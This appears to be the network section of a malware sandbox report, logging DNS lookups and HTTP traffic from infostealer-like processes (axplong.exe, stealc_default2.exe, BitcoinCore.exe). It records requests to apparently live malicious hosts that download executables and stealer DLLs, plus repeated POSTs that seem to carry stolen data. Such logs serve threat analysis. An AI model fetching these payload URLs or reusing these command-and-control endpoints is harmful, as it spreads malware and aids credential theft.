Request

GET /inc/Amadeus.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:42:08 GMT
Content-Type: application/octet-stream
Content-Length: 5562368
Last-Modified: Sat, 31 Aug 2024 23:00:17 GMT
Connection: keep-alive
ETag: "66d3a081-54e000"
Accept-Ranges: bytes
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:42:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.16/inc/runtime.exe

axplong.exe

Remote address:

185.215.113.16:80

Request

GET /inc/runtime.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:42:12 GMT
Content-Type: application/octet-stream
Content-Length: 551936
Last-Modified: Sat, 31 Aug 2024 15:35:27 GMT
Connection: keep-alive
ETag: "66d3383f-86c00"
Accept-Ranges: bytes
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:42:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:42:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.ax-0001.ax-msedge.net

g-bing-com.ax-0001.ax-msedge.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.28.10

ax-0001.ax-msedge.net

IN A

150.171.27.10
DNS

16.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

16.113.215.185.in-addr.arpa

IN PTR

Response
DNS

68.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

68.32.126.40.in-addr.arpa

IN PTR

Response
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=80d6e392998e4ff9bf5d01d2a8657991&localId=w:BB8B17D4-59B3-6ACA-B6DD-FE09489D2C70&deviceId=6896205358085503&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=80d6e392998e4ff9bf5d01d2a8657991&localId=w:BB8B17D4-59B3-6ACA-B6DD-FE09489D2C70&deviceId=6896205358085503&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=266207A02C4E6A8109C7134D2DAE6BCA; domain=.bing.com; expires=Fri, 26-Sep-2025 04:41:07 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 12E00217A3D44E26AFD7CCA56742361F Ref B: LON04EDGE1110 Ref C: 2024-09-01T04:41:07Z
date: Sun, 01 Sep 2024 04:41:07 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=80d6e392998e4ff9bf5d01d2a8657991&localId=w:BB8B17D4-59B3-6ACA-B6DD-FE09489D2C70&deviceId=6896205358085503&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=80d6e392998e4ff9bf5d01d2a8657991&localId=w:BB8B17D4-59B3-6ACA-B6DD-FE09489D2C70&deviceId=6896205358085503&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=266207A02C4E6A8109C7134D2DAE6BCA

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=e3E-hjsrvyevzp6TLkvINKP8OtGbtFekgmeWQpryNhc; domain=.bing.com; expires=Fri, 26-Sep-2025 04:41:08 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: FDE5C52E862549819CC102ADF22C362F Ref B: LON04EDGE1110 Ref C: 2024-09-01T04:41:08Z
date: Sun, 01 Sep 2024 04:41:07 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=80d6e392998e4ff9bf5d01d2a8657991&localId=w:BB8B17D4-59B3-6ACA-B6DD-FE09489D2C70&deviceId=6896205358085503&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=80d6e392998e4ff9bf5d01d2a8657991&localId=w:BB8B17D4-59B3-6ACA-B6DD-FE09489D2C70&deviceId=6896205358085503&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=266207A02C4E6A8109C7134D2DAE6BCA; MSPTC=e3E-hjsrvyevzp6TLkvINKP8OtGbtFekgmeWQpryNhc

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 3333CC95F1AE4E83B2949F97F1464644 Ref B: LON04EDGE1110 Ref C: 2024-09-01T04:41:08Z
date: Sun, 01 Sep 2024 04:41:07 GMT
DNS

ddl.safone.dev

axplong.exe

Remote address:

8.8.8.8:53

Request

ddl.safone.dev

IN A

Response

ddl.safone.dev

IN CNAME

cellular-coral-9r9jw7d9k5kj0dfl28uyy6l8.herokudns.com

cellular-coral-9r9jw7d9k5kj0dfl28uyy6l8.herokudns.com

IN A

54.247.69.169

cellular-coral-9r9jw7d9k5kj0dfl28uyy6l8.herokudns.com

IN A

52.212.52.84

cellular-coral-9r9jw7d9k5kj0dfl28uyy6l8.herokudns.com

IN A

63.32.161.232
GET

http://ddl.safone.dev/3823166/crypted.exe?hash=AgADZl

axplong.exe

Remote address:

54.247.69.169:80

Request

GET /3823166/crypted.exe?hash=AgADZl HTTP/1.1
Host: ddl.safone.dev

Response

HTTP/1.1 500 Internal Server Error

Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1725165667&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=%2FYrfO0tOYkACE4aVpIGI3uCsHO529VLqEsAnMR3NUs4%3D"}]}
Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1725165667&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=%2FYrfO0tOYkACE4aVpIGI3uCsHO529VLqEsAnMR3NUs4%3D
Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
Connection: keep-alive
Content-Type: text/plain; charset=utf-8
Content-Length: 22
Date: Sun, 01 Sep 2024 04:41:12 GMT
Server: Python/3.8 aiohttp/3.9.3
Via: 1.1 vegur
GET

http://ddl.safone.dev/3840366/Setup.exe?hash=AgADSh

axplong.exe

Remote address:

54.247.69.169:80

Request

GET /3840366/Setup.exe?hash=AgADSh HTTP/1.1
Host: ddl.safone.dev

Response

HTTP/1.1 500 Internal Server Error

Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1725165677&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=YdZAU%2F0WOYYsrGXoSCK0%2BNpqfSMvjjtGcciXLTw9OJk%3D"}]}
Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1725165677&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=YdZAU%2F0WOYYsrGXoSCK0%2BNpqfSMvjjtGcciXLTw9OJk%3D
Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
Connection: keep-alive
Content-Type: text/plain; charset=utf-8
Content-Length: 22
Date: Sun, 01 Sep 2024 04:41:23 GMT
Server: Python/3.8 aiohttp/3.9.3
Via: 1.1 vegur
GET

http://ddl.safone.dev/3840528/BitcoinCore.exe?hash=AgADrH

axplong.exe

Remote address:

54.247.69.169:80

Request

GET /3840528/BitcoinCore.exe?hash=AgADrH HTTP/1.1
Host: ddl.safone.dev

Response

HTTP/1.1 200 OK

Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1725165683&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=IchFowJlpvnZiG86XFl6qQ%2BBQCpP5Hja%2FVP3ZxpSRjY%3D"}]}
Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1725165683&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=IchFowJlpvnZiG86XFl6qQ%2BBQCpP5Hja%2FVP3ZxpSRjY%3D
Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
Connection: keep-alive
Content-Type: application/octet-stream
Range: bytes=0-13603327
Content-Range: bytes 0-13603327/13603328
Content-Disposition: attachment; filename="BitcoinCore.exe"
Accept-Ranges: bytes
Content-Length: 13603328
Date: Sun, 01 Sep 2024 04:41:23 GMT
Server: Python/3.8 aiohttp/3.9.3
Via: 1.1 vegur
GET

http://ddl.safone.dev/3830515/PureSyncInst.exe?hash=AgADvR

axplong.exe

Remote address:

54.247.69.169:80

Request

GET /3830515/PureSyncInst.exe?hash=AgADvR HTTP/1.1
Host: ddl.safone.dev

Response

HTTP/1.1 200 OK

Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1725165692&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=X2L83rsay1YVgbjvBNPPeUIdBl4NqGuS86jhHO%2FhaCg%3D"}]}
Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1725165692&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=X2L83rsay1YVgbjvBNPPeUIdBl4NqGuS86jhHO%2FhaCg%3D
Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
Connection: keep-alive
Content-Type: application/x-msdownload
Range: bytes=0-9697279
Content-Range: bytes 0-9697279/9697280
Content-Disposition: attachment; filename="PureSyncInst.exe"
Accept-Ranges: bytes
Content-Length: 9697280
Date: Sun, 01 Sep 2024 04:41:32 GMT
Server: Python/3.8 aiohttp/3.9.3
Via: 1.1 vegur
GET

http://ddl.safone.dev/3840509/build.exe?hash=AgADNB

axplong.exe

Remote address:

54.247.69.169:80

Request

GET /3840509/build.exe?hash=AgADNB HTTP/1.1
Host: ddl.safone.dev

Response

HTTP/1.1 500 Internal Server Error

Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1725165734&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=12Hc0l9V0GU2txZ5arjWw2Bj9PSr5lRTuX1yWfOdXvc%3D"}]}
Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1725165734&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=12Hc0l9V0GU2txZ5arjWw2Bj9PSr5lRTuX1yWfOdXvc%3D
Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
Connection: keep-alive
Content-Type: text/plain; charset=utf-8
Content-Length: 22
Date: Sun, 01 Sep 2024 04:42:19 GMT
Server: Python/3.8 aiohttp/3.9.3
Via: 1.1 vegur
DNS

169.69.247.54.in-addr.arpa

Remote address:

8.8.8.8:53

Request

169.69.247.54.in-addr.arpa

IN PTR

Response

169.69.247.54.in-addr.arpa

IN PTR

ec2-54-247-69-169 eu-west-1compute amazonawscom
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

133.211.185.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.211.185.52.in-addr.arpa

IN PTR

Response
GET

http://185.215.113.26/Nework.exe

axplong.exe

Remote address:

185.215.113.26:80

Request

GET /Nework.exe HTTP/1.1
Host: 185.215.113.26

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:41:15 GMT
Content-Type: application/x-msdos-program
Content-Length: 425984
Connection: keep-alive
Last-Modified: Sat, 24 Aug 2024 17:17:20 GMT
ETag: "68000-620711078a800"
Accept-Ranges: bytes
DNS

26.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.113.215.185.in-addr.arpa

IN PTR

Response
POST

http://185.215.113.26/Dem7kTu/index.php

Hkbsse.exe

Remote address:

185.215.113.26:80

Request

POST /Dem7kTu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.26
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:41:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://185.215.113.26/Dem7kTu/index.php

Hkbsse.exe

Remote address:

185.215.113.26:80

Request

POST /Dem7kTu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.26
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:41:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.17/

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET / HTTP/1.1
Host: 185.215.113.17
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:41:17 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HDHCGHDHIDHCBGCBGCAE
Host: 185.215.113.17
Content-Length: 214
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:41:17 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 180
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GHDBKFHIJKJKECAAAECA
Host: 185.215.113.17
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:41:18 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1520
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KFCBAEHCAEGDHJKFHJKF
Host: 185.215.113.17
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:41:18 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 7116
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIJJDGDHDGDAKFIECFIJ
Host: 185.215.113.17
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:41:18 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 108
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FCFIJEBFCGDAAKFHIDBF
Host: 185.215.113.17
Content-Length: 4947
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:41:18 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:41:18 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
ETag: "10e436-5e7ec6832a180"
Accept-Ranges: bytes
Content-Length: 1106998
Content-Type: application/x-msdos-program
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJDBGDHIIDAEBFHJJDBF
Host: 185.215.113.17
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:41:19 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GHCGDAFCFHIDBGDHCFCB
Host: 185.215.113.17
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:41:19 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.215.113.17/f1ddeb6592c03206/freebl3.dll

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET /f1ddeb6592c03206/freebl3.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:41:20 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "a7550-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 685392
Content-Type: application/x-msdos-program
GET

http://185.215.113.17/f1ddeb6592c03206/mozglue.dll

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET /f1ddeb6592c03206/mozglue.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:41:20 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "94750-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 608080
Content-Type: application/x-msdos-program
GET

http://185.215.113.17/f1ddeb6592c03206/msvcp140.dll

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:41:21 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "6dde8-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 450024
Content-Type: application/x-msdos-program
GET

http://185.215.113.17/f1ddeb6592c03206/nss3.dll

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET /f1ddeb6592c03206/nss3.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:41:21 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "1f3950-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 2046288
Content-Type: application/x-msdos-program
GET

http://185.215.113.17/f1ddeb6592c03206/softokn3.dll

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET /f1ddeb6592c03206/softokn3.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:41:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "3ef50-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 257872
Content-Type: application/x-msdos-program
GET

http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:41:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "13bf0-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 80880
Content-Type: application/x-msdos-program
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IIIDAKJDHJKFHIEBFCGH
Host: 185.215.113.17
Content-Length: 947
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:41:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKE
Host: 185.215.113.17
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:41:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2408
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJJEGCGDGHCBFHIDHDAA
Host: 185.215.113.17
Content-Length: 265
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:41:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJD
Host: 185.215.113.17
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:41:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKF
Host: 185.215.113.17
Content-Length: 272
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:41:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIEC
Host: 185.215.113.17
Content-Length: 272
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:41:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

17.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

17.113.215.185.in-addr.arpa

IN PTR

Response
DNS

51.18.21.65.in-addr.arpa

Remote address:

8.8.8.8:53

Request

51.18.21.65.in-addr.arpa

IN PTR

Response

51.18.21.65.in-addr.arpa

IN PTR

static51182165clientsyour-serverde
DNS

53.107.216.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

53.107.216.95.in-addr.arpa

IN PTR

Response

53.107.216.95.in-addr.arpa

IN PTR

static5310721695clientsyour-serverde
DNS

86.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.23.85.13.in-addr.arpa

IN PTR

Response
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR

Response
DNS

65.139.73.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

65.139.73.23.in-addr.arpa

IN PTR

Response

65.139.73.23.in-addr.arpa

IN PTR

a23-73-139-65deploystaticakamaitechnologiescom
DNS

fastcareasy.store

BitcoinCore.exe

Remote address:

8.8.8.8:53

Request

fastcareasy.store

IN A

Response

fastcareasy.store

IN A

104.21.53.180

fastcareasy.store

IN A

172.67.216.26
POST

https://fastcareasy.store/does-tim-rozon-sing?ukfcmqc3u=DjWDFxEj2%2FJOST%2FfYfvu8KeOOhazrTE5qan0pWAmsD53LTufA8izkzEG9WYbze6DJ5BJFMzLUVqogbE1TtwO2A%3D%3D

BitcoinCore.exe

Remote address:

104.21.53.180:443

Request

POST /does-tim-rozon-sing?ukfcmqc3u=DjWDFxEj2%2FJOST%2FfYfvu8KeOOhazrTE5qan0pWAmsD53LTufA8izkzEG9WYbze6DJ5BJFMzLUVqogbE1TtwO2A%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Length: 96
